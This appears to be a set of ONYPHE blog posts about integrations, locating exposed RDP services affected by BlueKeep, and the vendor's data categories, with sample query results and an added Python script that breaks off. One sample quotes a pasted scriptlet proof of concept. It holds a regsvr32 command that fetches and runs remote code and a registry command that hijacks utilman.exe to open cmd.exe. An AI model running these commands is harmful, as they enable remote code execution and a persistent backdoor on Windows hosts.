For any question, contact sales(at)onyphe(dot)com.

Best regards,

Open-source projects with ONYPHE integration

In this blog post, we provide a mostly complete list of open-source projects or libraries that let you integrate our data directly into your daily tasks.

Libraries

Open-source projects

Browser plugins

SIEM

Find your exposed Microsoft RDP services

CVE-2019-0708 (BlueKeep) is an unauthenticated remote code execution vulnerability in the Microsoft RDP service. As the patch is out, you should apply it as quickly as possible, before the bad guys start exploiting it.

But what if you don’t know where are your servers to patch?

Most companies have a hard time locating and keeping an inventory of all their assets, especially those exposed on the Internet. Another cause is the explosion of shadow IT or shadow cloud. In this blog post, we describe how to locate them by querying our data.

Identify your network blocks

If you are a mature company, you probably already have a list of all your subnets (in your own datacenters or possibly outsourced). That's great. But what if you don't?

You could use our inetnum category of data to first build the list of subnets you will then use to search for open RDP services. The subnet field is the way to go for such a use case. Another possibility, if you are a big company, is to get the list of your own AS numbers by listing asn field values.

Some requests you can enter in our search engine (or via our API) to achieve this:

category:inetnum netname:"your netname"
category:inetnum organization:"your organization"
category:inetnum domain:your_domain.com
category:inetnum asn:ASyour_number
category:inetnum ip:some_of_your_ips

Note: search filters are only available when you have access to the Search API. These APIs are available starting from "Dragonfly View" [1].

As a customer, you can also use the new (currently BETA) -wildcard function:

category:inetnum -wildcard:netname,*your_organization*
category:inetnum -wildcard:organization,*your_organization*

What will interest you most is the value of the subnet field. By listing all of them, you will be able to go to the next step and find open RDP services.

Note: search functions are only available for "Entreprise Views" [1]. The -wildcard function only searches the previous day of results by default. To search further back, use the -dayago function, for instance -dayago:4 to search 4 days ago.

Sample result for inetnum category:

Search by using the synscan category of information

While performing SYN scans over the full IPv4 address space, we also perform reliable remote Operating System (OS) identification. You can base the following searches on such data to identify open 3389/tcp ports on Windows hosts within the subnets identified in the previous step.

category:synscan ip:93.184.216.0/24 os:Windows port:3389
category:synscan asn:ASyour_number os:Windows port:3389
category:synscan organization:"your organization" os:Windows port:3389

Note: the CIDR search (like the Search API, which allows the use of these search filters) is only available starting from the "Dragonfly View", as described at [1].

Note 2: values are case sensitive in all searches, so be sure to write Windows with a capital W and not windows, which would yield no result.

Sample result for synscan category:

Search by using the datascan category of information

The previous method will eventually return matches, but the best way is to leverage the datascan category. synscan entries carry no information about the application layer, while datascan entries do. In fact, we identify the application-layer protocol, and you can search directly on the protocol field:

category:datascan protocol:rdp ip:93.184.216.0/24 os:Windows
category:datascan protocol:rdp asn:ASyour_number os:Windows
category:datascan protocol:rdp organization:"your organization" os:Windows

Note: thanks to that protocol identification, we may also have results for RDP services not listening on the usual 3389/tcp port.

Now that you have a complete list of all your subnets and AS numbers, you can refine the search to discover your Internet-exposed assets.
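The two steps, extracting your subnets from inetnum results and then filtering datascan results down to RDP services inside them, can be chained offline on exported results, which also catches RDP on non-standard ports as the note above describes. The following is an added example, not ONYPHE's code: the subnet, ip, port, protocol and os field names come from the queries in this post, and both result sets are constructed.

```python
"""Added example (not ONYPHE's code): extract subnets from inetnum results,
then keep the datascan results inside them that expose RDP (protocol:rdp or
port 3389).  Both result sets below are constructed."""
import ipaddress
import json

# Constructed inetnum results (what the netname/organization queries return).
SAMPLE_INETNUM = "\n".join(json.dumps(d) for d in [
    {"@category": "inetnum", "subnet": "93.184.216.0/24", "netname": "EXAMPLE-NET"},
    {"@category": "inetnum", "subnet": "203.0.113.0/25", "netname": "EXAMPLE-DC"},
    {"@category": "inetnum", "subnet": "203.0.113.0/25", "netname": "EXAMPLE-DC"},  # duplicate
])

# Constructed datascan results.
SAMPLE_DATASCAN = "\n".join(json.dumps(d) for d in [
    {"@category": "datascan", "ip": "93.184.216.34", "port": 3389, "protocol": "rdp", "os": "Windows"},
    {"@category": "datascan", "ip": "203.0.113.9", "port": 13389, "protocol": "rdp", "os": "Windows"},   # non-standard port
    {"@category": "datascan", "ip": "203.0.113.200", "port": 3389, "protocol": "rdp", "os": "Windows"},  # outside the /25
    {"@category": "datascan", "ip": "93.184.216.40", "port": 443, "protocol": "http", "os": "Windows"},
])


def _records(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def subnets_from_inetnum(export_text: str) -> list:
    """Deduplicated ip_network objects taken from the subnet field."""
    nets = {ipaddress.ip_network(r["subnet"], strict=False)
            for r in _records(export_text) if r.get("subnet")}
    return sorted(nets, key=lambda n: (n.version, int(n.network_address), n.prefixlen))


def in_scope(ip: str, networks) -> bool:
    """True when the address falls inside one of your subnets."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def exposed_rdp(export_text: str, networks) -> list:
    """(ip, port) of RDP services inside your subnets, whatever the port.

    A record counts as RDP when the identified protocol is rdp or the port is
    the default 3389/tcp, so both datascan and synscan exports can be fed in."""
    hits = set()
    for r in _records(export_text):
        is_rdp = r.get("protocol") == "rdp" or int(r.get("port", 0)) == 3389
        if is_rdp and in_scope(r["ip"], networks):
            hits.add((r["ip"], int(r["port"])))
    return sorted(hits)


if __name__ == "__main__":
    nets = subnets_from_inetnum(SAMPLE_INETNUM)
    print("subnets:", [str(n) for n in nets])
    for ip, port in exposed_rdp(SAMPLE_DATASCAN, nets):
        print(f"RDP exposed: {ip}:{port}")
```

The CIDR containment check is what prevents a neighbour's host in the same /24 block (203.0.113.200 above, outside your /25) from ending up on your patch list.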

Search using DNS resolution enrichments within the datascan category of information

As we perform numerous DNS resolutions to enrich our data, you may also search your exposed assets by querying related fields like:

  • domain: the domain name with only one "." character;
  • subdomains: one of your subdomains, those with multiple "." characters;
  • hostname: the fully qualified domain name;
  • reverse: the reverse (PTR) fully qualified domain name.

category:datascan protocol:rdp domain:your_domain.com
category:datascan protocol:rdp subdomains:sub.your_domain.com
category:datascan protocol:rdp hostname:www.sub.your_domain.com
category:datascan protocol:rdp reverse:ptr.your_domain.com

Sample result:

The admin tag

And if you want to put this kind of surveillance into practice, you may also directly use the tag:admin filter. It matches any remote administration protocol used to perform administrative tasks, like RDP, SSH or telnet (the list is not exhaustive).

And sometimes, administrative interfaces are vulnerable to some CVEs…

Sample result:

Conclusion

As CVE-2019-0708 is claimed to be wormable, we urge our customers to run the described searches. If you are not yet a customer, take a look at our pricing page [1] and don't hesitate to contact us at sales[at]onyphe.io for any enquiry.

[1] https://www.onyphe.io/pricing/

Enterprise information categories

Enterprise information categories are the ones only accessible to Enterprise View customers. Of course, these customers also have access to the standard information categories.

The following categories are defined as enterprise:

  • onionscan
  • onionshot
  • datashot
  • topsite
  • vulnscan

Enterprise information categories description

Each collected entry is enriched with a timestamp and, where applicable, geolocation information.

onionscan category

As well as crawling the clear Net and the clear Web with the datascan information category, we also crawl the Dark Web (also known as onion land). As of today, we only crawl it using the HTTP protocol.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "onionscan",
      "@timestamp": "2018-10-24T19:03:31.000Z",
      "@type": "doc",
      "app": {
        "extract": {
          "domain": [
            "wikipedia.org",
            "wikibooks.org",
            "haskell.org",
            "ats-lang.org"
          ],
          "file": [
            "grdt-popl03.pdf"
          ],
          "hostname": [
            "en.wikibooks.org",
            "en.wikipedia.org",
            "wiki.haskell.org",
            "www.ats-lang.org"
          ],
          "url": [
            "http://www.ats-lang.org/MYDATA/GRDT-popl03.pdf",
            "http://www.ats-lang.org/",
            "https://en.wikibooks.org/wiki/Haskell/GADT",
            "https://wiki.haskell.org/GADTs_for_dummies",
            "https://en.wikipedia.org/wiki/Generalized_algebraic_data_type"
          ]
        },
        "http": {
          "bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
          "headermd5": "297ee2062d5eab6d7a30bd8656730536",
          "title": "Bluish Coder"
        },
        "length": "4096"
      },
      "cpe": [
        "cpe:/a:igor_sysoev:nginx:1.10.3"
      ],
      "data": "HTTP/1.1 200 OK\r\nContent-Length: 93915\r\nETag: \"5bc71236-16edb\"\r\nDate: Wed, 24 Oct 2018 19:03:31 GMT\r\nLast-Modified: Wed, 17 Oct 2018 10:43:02 GMT\r\nServer: nginx/1.10.3 (Ubuntu)\r\nContent-Type: text/html\r\nAccept-Ranges: bytes\r\nConnection: keep-alive\r\n\r\n\n<!DOCTYPE html>\n<html>\n<head>\n   <meta http-equiv=\"content-type\" content=\"text/html; cha
[..]
      "datamd5": "6f50408650910af16c5f8b229202264e",
      "device": {
        "class": "Web Server"
      },
      "domain": "mh7mkfvezts5j6yu.onion",
      "hostname": "mh7mkfvezts5j6yu.onion",
      "onion": "mh7mkfvezts5j6yu.onion",
      "os": "Linux",
      "osdistribution": "Ubuntu",
      "port": 80,
      "product": "Nginx",
      "productvendor": "Igor Sysoev",
      "productversion": "1.10.3",
      "protocol": "http",
      "protocolversion": "1.1",
      "reason": "OK",
      "seen_date": "2018-10-24",
      "source": "datascan",
      "status": "200",
      "tag": [
        "ok"
      ],
      "tls": "false",
      "url": "/"
    },
[..]
  ],
  "status": "ok",
  "took": "0.004",
  "total": 2
}

onionshot category

As we crawl the Dark Web, we also take screenshots of every onion Web site we reach. This category of information stores those screenshots.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "onionshot",
      "@timestamp": "2019-05-07T15:49:37.000Z",
      "@type": "doc",
      "app": {
        "http": {
          "bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
          "headermd5": "1d4ac9665b20bd9523d1d398e3afb4e6"
        },
        "length": "177",
        "screenshot": {
          "format": "jpg",
          "image": "/9j/4AAQSkZJRgABAQEAZABkAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARC
[..]
          "imagemd5": "de9c6f35276f5fbd045c0f6ef27d7ba3"
        }
      },
      "data": "QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'\nlibpng warning: iCCP: known incorrect sRGB profile\nlibpng warning: iCCP: known incorrect sRGB profile\n",
      "datamd5": "1d4ac9665b20bd9523d1d398e3afb4e6",
      "device": {
        "class": "Web Server"
      },
      "domain": "b2ebtnyz25tr4nxl.onion",
      "forward": "b2ebtnyz25tr4nxl.onion",
      "hostname": "b2ebtnyz25tr4nxl.onion",
      "onion": "b2ebtnyz25tr4nxl.onion",
      "port": 80,
      "protocol": "http",
      "seen_date": "2019-05-07",
      "source": "onionscan",
      "tls": "false",
      "transport": "tcp",
      "url": "/"
    },
[..]
  ],
  "status": "ok",
  "took": "0.184",
  "total": 2
}

datashot category

Some protocols expose a graphical view of an interface, so we take screenshots against the following protocols:

  • x11
  • vnc
  • rdp
  • rtsp

{
  "count": 10,
  "error": 0,
  "max_page": 456,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "datashot",
      "@timestamp": "2019-05-08T04:32:30.000Z",
      "@type": "doc",
      "app": {
        "length": "599",
        "screenshot": {
          "format": "jpg",
          "image": "/9j/7gAOQWRvYmUAZAAAAAAA/9sAQwABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB/8AAEQgBkALQA1IRAEcRAEIRAP/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECA
[..]
          "imagemd5": "2c685c23737b6c9d8c0975599088a991"
        },
        "vnc": {
          "authentication": "null",
          "desktopname": "QEMU (opnsense)",
          "screensize": "720x400",
          "version": "3.8"
        }
      },
      "asn": "AS32613",
      "city": "Montreal",
      "country": "CA",
      "data": "VNC server supports protocol version 3.8 (viewer 3.3)\nNo authentication needed\nDesktop name \"QEMU (opnsense)\"\nConnected to VNC server, using protocol version 3.3\nVNC server default format:\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 0 green 8 blue 16",
      "datamd5": "524ba7c9686dcc17075c5c3260be070f",
      "device": {
        "class": "VNC Server"
      },
      "ip": "<redacted>",
      "ipv6": "false",
      "location": "45.4594,-73.5501",
      "organization": "iWeb Technologies Inc.",
      "port": "5901",
      "protocol": "vnc",
      "seen_date": "2019-05-08",
      "source": "datascan",
      "subnet": "<redacted>/22",
      "tag": [
        "admin"
      ],
      "tls": "false",
      "transport": "tcp"
    },
[..]
  ],
  "status": "ok",
  "took": "0.205",
  "total": 4557
}

topsite category

Alexa Top 1 Million, Cisco Umbrella and Majestic are three sources of information when it comes to the most visited domains or hostnames. We collect all of them and perform mass DNS requests to fill the resolver and topsite categories of information. Of course, we perform both IPv4 and IPv6 DNS queries.

{
  "count": 10,
  "error": 0,
  "max_page": 67,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "topsite",
      "@timestamp": "2020-03-04T06:32:14.000Z",
      "asn": "AS13335",
      "country": "US",
      "domain": "leparking-moto.fr",
      "forward": "cloud.leparking-moto.fr",
      "host": "cloud",
      "hostname": "cloud.leparking-moto.fr",
      "ip": "2606:4700:3034:0:0:0:6812:2d86",
      "ipv6": "true",
      "latitude": "37.7510",
      "location": "37.7510,-97.8220",
      "longitude": "-97.8220",
      "organization": "CLOUDFLARENET",
      "seen_date": "2020-03-04",
      "source": "umbrella",
      "subnet": "2606:4700::/32",
      "tag": [
         "top1m",
         "umbrella"
      ],
      "tld": "fr"
    },
[..]
  ],
  "status": "ok",
  "text": "Success",
  "took": 0.051,
  "total": 665
}

vulnscan category

New in 2020: we scan for specific vulnerabilities, those rated highly critical, affecting widely deployed products, and that should have been patched yesterday. For instance, #Shitrix, CVE-2019-19781, impacting Citrix Gateway appliances. The data is exactly the same as what you find in the datascan category of information, but the vulnscan category is only available to Eagle View customers.

Other information categories

We also collect other information categories, as described in this post.

Standard information categories

Standard information categories are the ones any plan user has access to: even unregistered Web users or registered Free Plan users have access to this kind of information. Of course, registered Free Plan users have other benefits, as described on our pricing page.

The following categories are defined as standard:

  • inetnum
  • synscan
  • datascan
  • pastries
  • resolver
  • threatlist
  • geoloc
  • sniffer
  • ctl

Note: having access to a category doesn’t necessarily mean that you have access to every field (or filter) of an entry. There is also a distinction between standard filters and advanced filters.

Standard information categories description

Each collected entry is enriched with a timestamp and, where applicable, geolocation information.

inetnum category

Descriptions of IP (v4 and v6) networks as given by the RIRs (Regional Internet Registries), except for the United States, where that information is not disclosed publicly.

{
  "count": 10,
  "error": 0,
  "max_page": 8,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "inetnum",
      "@timestamp": "2018-10-21T01:35:36.000Z",
      "@type": "doc",
      "country": "US",
      "ipv6": "false",
      "netname": "EU-EDGECASTEU-20080602",
      "seen_date": "2018-10-21",
      "source": "RIPE",
      "subnet": "93.184.208.0/20"
    },
    {
      "@category": "inetnum",
      "@timestamp": "2018-10-21T01:35:36.000Z",
      "@type": "doc",
      "country": "EU",
      "information": [
        "NETBLK-03-EU-93-184-208-0-24"
      ],
      "ipv6": "false",
      "netname": "EDGECAST-NETBLK-03",
      "seen_date": "2018-10-21",
      "source": "RIPE",
      "subnet": "93.184.208.0/24"
    },
[..]
  ],
  "status": "ok",
  "took": "0.733",
  "total": 74
}

synscan category

Open TCP ports found on the Internet. Each open port is also enriched with the detected operating system (using our own TCP/IP stack fingerprinting technique). As of today, nearly 50 ports are scanned at least once a month, but other ports may be scanned in response to press releases.

{
  "count": 3,
  "error": 0,
  "max_page": 2,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "synscan",
      "@timestamp": "2018-10-20T12:59:57.000Z",
      "@type": "doc",
      "asn": "AS18779",
      "city": "San Jose",
      "country": "US",
      "ip": "107.164.81.7",
      "ipv6": "false",
      "location": "37.3387,-121.8914",
      "organization": "EGIHosting",
      "os": "Linux",
      "port": "80",
      "seen_date": "2018-10-20",
      "subnet": "107.164.0.0/17"
    },
[..]
  ],
  "status": "ok",
  "took": "0.026",
  "total": 3
}

datascan category

Application responses to our application requests. Application requests are sent to the open TCP ports found by synscan, or directly to some UDP ports. We use our own technology for protocol identification and can recognize more than 40 different protocols (as of today). Thanks to this methodology, instead of searching our data on a per-port basis, you can simply search by protocol.

Furthermore, as well as crawling the clear Net for the HTTP protocol, we also crawl the clear Web by using domain name information when performing HTTP/1.1 requests with a valid Host header. Thus, we are able to identify multiple virtual hosts behind a single IP address.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "datascan",
      "@timestamp": "2018-10-26T10:30:15.000Z",
      "@type": "doc",
      "app": {
        "extract": {
          "domain": [
            "w3.org",
            "microsoft.com"
          ],
          "hostname": [
            "go.microsoft.com",
            "www.w3.org"
          ],
          "url": [
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd",
            "http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409",
            "http://www.w3.org/1999/xhtml"
          ]
        },
        "http": {
          "bodymd5": "ac3b7fe8b6538dad865f905fa06cf19e",
          "headermd5": "3a194f303abdadec442ba1646de5b2c8",
          "title": "IIS7"
        },
        "length": "934"
      },
      "asn": "AS18779",
      "city": "San Jose",
      "country": "US",
      "cpe": [
        "cpe:/a:microsoft:iis:7.5"
      ],
      "data": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nLast-Modified: Sat, 18 Aug 2018 21:54:32 GMT\r\nAccept-Ranges: bytes\r\nETag: \"f35f1b3e37d41:0\"\r\nServer: Microsoft-IIS/7.5\r\nX-Powered-By: ASP.NET\r\nDate: Fri, 26 Oct 2018 10:29:58 GMT\r\nContent-Length: 689\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\r\n<title>IIS7</title>\r\n<style type=\"text/css\">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#B3B3B3;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id=\"container\">\r\n<a href=\"http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409\"><img src=\"welcome.png\" alt=\"IIS7\" width=\"571\" height=\"411\" /></a>\r\n</div>\r\n</body>\r\n</html>",
      "datamd5": "5cad586f64f2e431634331ca755e5039",
      "device": {
        "class": "Web Server"
      },
      "ip": "107.164.96.182",
      "ipv6": "false",
      "location": "37.3387,-121.8914",
      "organization": "EGIHosting",
      "os": "Windows",
      "osvendor": "Microsoft",
      "osversion": [
        "Server 2008",
        "7"
      ],
      "port": "80",
      "product": "IIS",
      "productvendor": "Microsoft",
      "productversion": "7.5",
      "protocol": "http",
      "protocolversion": "1.1",
      "reason": "OK",
      "seen_date": "2018-10-26",
      "source": "datascan",
      "status": "200",
      "subnet": "107.164.0.0/17",
      "tag": [
        "default",
        "ok"
      ],
      "tls": "false"
    },
[..]
  ],
  "status": "ok",
  "took": "0.011",
  "total": 2
}

pastries category

Content of pasties collected continuously. As of today, only pastebin is collected. Each collected pastie is enriched with DNS information (where applicable). That is, you can search for an IP address in the pastries category and find pasties linked to it, even though only a URL was contained in the original pastie. The same is true for domain names and many other DNS-related pieces of information.

{
  "count": 10,
  "error": 0,
  "max_page": 344,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "pastries",
      "@timestamp": "2018-10-26T09:38:41.000Z",
      "@type": "doc",
      "content": "<?XML version=\"1.0\"?>\r\n<scriptlet>\r\n\r\n<registration\r\n    description=\"Bandit\"\r\n    progid=\"Bandit\"\r\n    version=\"1.00\"\r\n    classid=\"{AAAA1111-0000-0000-0000-0000FEEDACDC}\"\r\n\t>\r\n\t\r\n\t<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll\r\n\t<!-- DFIR -->\r\n\t<!--\t\t.sct files are downloaded and executed from a path like this -->\r\n\t<!-- Though, the name and extension are arbitary.. -->\r\n\t<!-- c:\\users\\USER\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2vcqsj3k\\file[2].sct -->\r\n\t<!-- Based on current research, no registry keys are written, since call \"uninstall\" -->\r\n\t\r\n\t\r\n\t<!-- Proof Of Concept - Casey Smith @subTee -->\r\n\t<script language=\"JScript\">\r\n\t\t<![CDATA[\r\n\t\r\n\t\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\r\n\t\r\n\t\t]]>\r\n\t</script>\r\n</registration>\r\n\r\n<public>\r\n    <method name=\"Exec\"></method>\r\n</public>\r\n<script language=\"JScript\">\r\n<![CDATA[\r\n\t\r\n\tfunction Exec()\r\n\t{\r\n\t\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"reg add 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe' /t REG_SZ /v Debugger /d 'C:\\Windows\\System32\\cmd.exe' /f\");\r\n\t}\r\n\t\r\n]]>\r\n</script>\r\n\r\n</scriptlet>",
      "domain": [
        "example.com"
      ],
      "file": [
        "utilman.exe",
        "calc.exe",
        "wscript.sh",
        "scrobj.dll",
        "cmd.exe"
      ],
      "ip": [
        "2606:2800:220:1:248:1893:25c8:1946",
        "93.184.216.34"
      ],
      "key": "2WpScvHm",
      "scheme": [
        "http"
      ],
      "seen_date": "2018-10-26",
      "size": "1178",
      "source": "pastebin",
      "syntax": "text",
      "tld": "com",
      "url": [
        "http://example.com/file.sct"
      ]
    },
[..]
  ],
  "status": "ok",
  "took": "0.028",
  "total": 504
}

resolver category

Each time an IP address (v4 or v6) or a host name is found in collected information (whatever the source category), we perform DNS requests (both forward and reverse). The resulting passive DNS information is collected and stored in this information category.

{
  "count": 10,
  "error": 0,
  "max_page": 2,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "resolver",
      "@timestamp": "2018-10-22T22:27:36.000Z",
      "@type": "doc",
      "asn": "AS20940",
      "city": "Bielefeld",
      "country": "DE",
      "domain": "go.com",
      "forward": "cdn.abclocal.go.com",
      "host": "cdn",
      "ip": "2.22.52.73",
      "ipv6": "false",
      "location": "52.0106,8.5493",
      "organization": "Akamai International B.V.",
      "seen_date": "2018-10-22",
      "source": "pastries",
      "subdomains": [
        "abclocal.go.com"
      ],
      "subnet": "2.22.52.0/24",
      "tld": "com",
      "type": "forward"
    },

[..]
  ],
  "status": "ok",
  "took": "0.050",
  "total": 18
}

threatlist category

We collect and aggregate a fair number of open threat lists; as of today, 25 lists are aggregated. We also maintain our own threat lists based on our honeypots. For instance, we have dedicated lists for the Mirai and Broadcom UPnP Hunter botnets.

{
  "count": 3,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "threatlist",
      "@timestamp": "2018-07-24T08:35:41.000Z",
      "@type": "doc",
      "asn": "AS14061",
      "city": "Frankfurt am Main",
      "country": "DE",
      "ipv6": "false",
      "location": "50.1153,8.6823",
      "organization": "DigitalOcean, LLC",
      "seen_date": "2018-07-24",
      "subnet": "206.81.18.195/32",
      "tag": [
        "botnet",
        "mirai"
      ],
      "threatlist": "ONYPHE - botnet/mirai"
    },
[..]
  ],
  "status": "ok",
  "took": "0.015",
  "total": 3
}

geoloc category

Geolocation information for IP addresses (v4 and v6) based on MaxMind GeoLite2. Along with collecting and tracking that information, we also perform reverse DNS requests on the records and enrich entries with the result.

{
  "count": 10,
  "error": 0,
  "max_page": 1000,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "geoloc",
      "@timestamp": "2019-04-30T10:00:00.000Z",
      "@type": "doc",
      "asn": "AS16276",
      "country": "FR",
      "domain": "ganesha.fr",
      "host": "ladaptfoad",
      "ip": "91.121.229.97",
      "ipv6": "false",
      "location": "48.8582,2.3387",
      "organization": "OVH SAS",
      "reverse": "ladaptfoad.ganesha.fr",
      "seen_date": "2019-04-30",
      "source": "geolite2",
      "subnet": "91.121.229.96/27",
      "tld": "fr"
    },
    {
      "@category": "geoloc",
      "@timestamp": "2019-04-30T10:00:00.000Z",
      "@type": "doc",
      "asn": "AS16276",
      "country": "PT",
      "domain": "ip-91-121-224.eu",
      "host": "ip11",
      "ip": "91.121.224.11",
      "ipv6": "false",
      "location": "38.7139,-9.1394",
      "organization": "OVH SAS",
      "reverse": "ip11.ip-91-121-224.eu",
      "seen_date": "2019-04-30",
      "source": "geolite2",
      "subnet": "91.121.224.10/31",
      "tld": "eu"
    },
[..]
  ],
  "status": "ok",
  "took": "0.067",
  "total": 115769
}

sniffer category

We operate a number of distributed honeypots on the Internet. We listen to Internet background noise and perform passive operating system identification (using our own TCP/IP stack fingerprinting technique).

Furthermore, when a malicious pattern is found, we perform a synscan along with a datascan to collect more information about the source IP address. The synscan, datascan, resolver and threatlist information categories are enriched thanks to this category.

{
  "count": 10,
  "error": 0,
  "max_page": 38,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "sniffer",
      "@timestamp": "2018-10-26T08:55:39.000Z",
      "@type": "doc",
      "asn": "AS45899",
      "city": "Can Tho",
      "country": "VN",
      "data": "k\\xa6\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x00!\\x00\\x01",
      "datamd5": "9e172f3c20c7af5b5776dc0d1177c97c",
      "destport": "137",
      "domain": "vnpt.vn",
      "host": "static",
      "ip": "14.164.46.122",
      "ipv6": "false",
      "location": "10.0333,105.7833",
      "organization": "VNPT Corp",
      "reverse": "static.vnpt.vn",
      "seen_date": "2018-10-26",
      "srcport": "17453",
      "subnet": "14.164.0.0/14",
      "tag": [
        "hasreverse",
        "netbiosns",
        "udpdata"
      ],
      "tld": "vn",
      "transport": "udp",
      "type": "udpdata"
    },

[..]
  ],
  "status": "ok",
  "took": "0.045",
  "total": 374
}

ctl category

We collect X.509 certificate information from some Certificate Transparency Logs (CTLs). As with some other information categories, we perform DNS requests (IPv4 and IPv6) to enrich the collected data with DNS-related information, which also feeds our passive DNS (resolver information category).

{
  "count": 10,
  "error": 0,
  "max_page": 96,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "ctl",
      "@timestamp": "2018-10-26T11:45:56.000Z",
      "@type": "doc",
      "basicconstraints": [
        "critical"
      ],
      "ca": "false",
      "domain": "freese-feldhaus.de",
      "extkeyusage": [
        "serverAuth",
        "clientAuth"
      ],
      "fingerprint": {
        "md5": "63dc7530020e76cd599e914b1ede8e8e",
        "sha1": "ba4ef99d26ae0514076e33c3f5f7da40716427b9",
        "sha256": "b2b52ca06085edc1240177aaee0b6704ac9f6ebe178d5774d76de4a969fe8aac"
      },
      "host": "vpn",
      "ip": "80.228.36.150",
      "issuer": {
        "commonname": "COMODO RSA Domain Validation Secure Server CA",
        "country": "GB",
        "organization": "COMODO CA Limited"
      },
      "keyusage": [
        "critical",
        "digitalSignature",
        "keyEncipherment"
      ],
      "publickey": {
        "algorithm": "rsaEncryption",
        "exponent": "65537",
        "length": "2048"
      },
      "seen_date": "2018-10-26",
      "serial": "03:41:31:f7:9c:1c:f7:c0:59:db:b9:09:a2:aa:06:44",
      "signature": {
        "algorithm": "sha256WithRSAEncryption"
      },
      "source": "Cloudflare Nimbus 2020",
      "subject": {
        "altname": [
          "vpn.freese-feldhaus.de",
          "www.vpn.freese-feldhaus.de"
        ],
        "commonname": "www.vpn.freese-feldhaus.de"
      },
      "tld": "de",
      "validity": {
        "notafter": "2020-10-25T23:59:59.000Z",
        "notbefore": "2018-10-26T00:00:00.000Z"
      },
      "version": "v3",
      "wildcard": "false"
    },
[..]
  ],
  "status": "ok",
  "took": "0.017",
  "total": 952
}
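The resolver and ctl categories above are the two you combine to inventory the names of a domain. The following Python script is an added example, not ONYPHE's code: from ctl entries (subject.commonname, subject.altname, validity.notafter, in the shape shown above) and forward resolver entries (type, forward, ip) it builds the list of hostnames seen in certificates for one domain and flags what a defender wants to know: wildcard certificates, certificates expiring within 30 days, names that appear in CT logs but never resolved, and names resolving to addresses outside your own subnets. The example.com, example.net, 203.0.113.0/24 and 198.51.100.0/24 values are constructed sample data.

```python
"""Added example: hostname inventory for one domain from ctl and resolver entries."""
import ipaddress
from datetime import datetime, timedelta, timezone


def _in_domain(name, domain):
    """True for the domain itself and anything beneath it (a leading *. is ignored)."""
    bare = name[2:] if name.startswith("*.") else name
    return bare == domain or bare.endswith("." + domain)


def cert_names(ctl_entry, domain):
    """Hostnames a certificate claims under the domain: CN plus subject.altname."""
    subject = ctl_entry.get("subject", {})
    names = set(subject.get("altname", []))
    if subject.get("commonname"):
        names.add(subject["commonname"])
    return sorted(n for n in names if _in_domain(n, domain))


def not_after(ctl_entry):
    """validity.notafter is formatted like 2020-10-25T23:59:59.000Z on this page."""
    raw = ctl_entry["validity"]["notafter"]
    return datetime.strptime(raw, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def inventory(ctl_entries, resolver_entries, domain, owned_subnets, now, within_days=30):
    """Cross-check certificate names against passive DNS and your own address space."""
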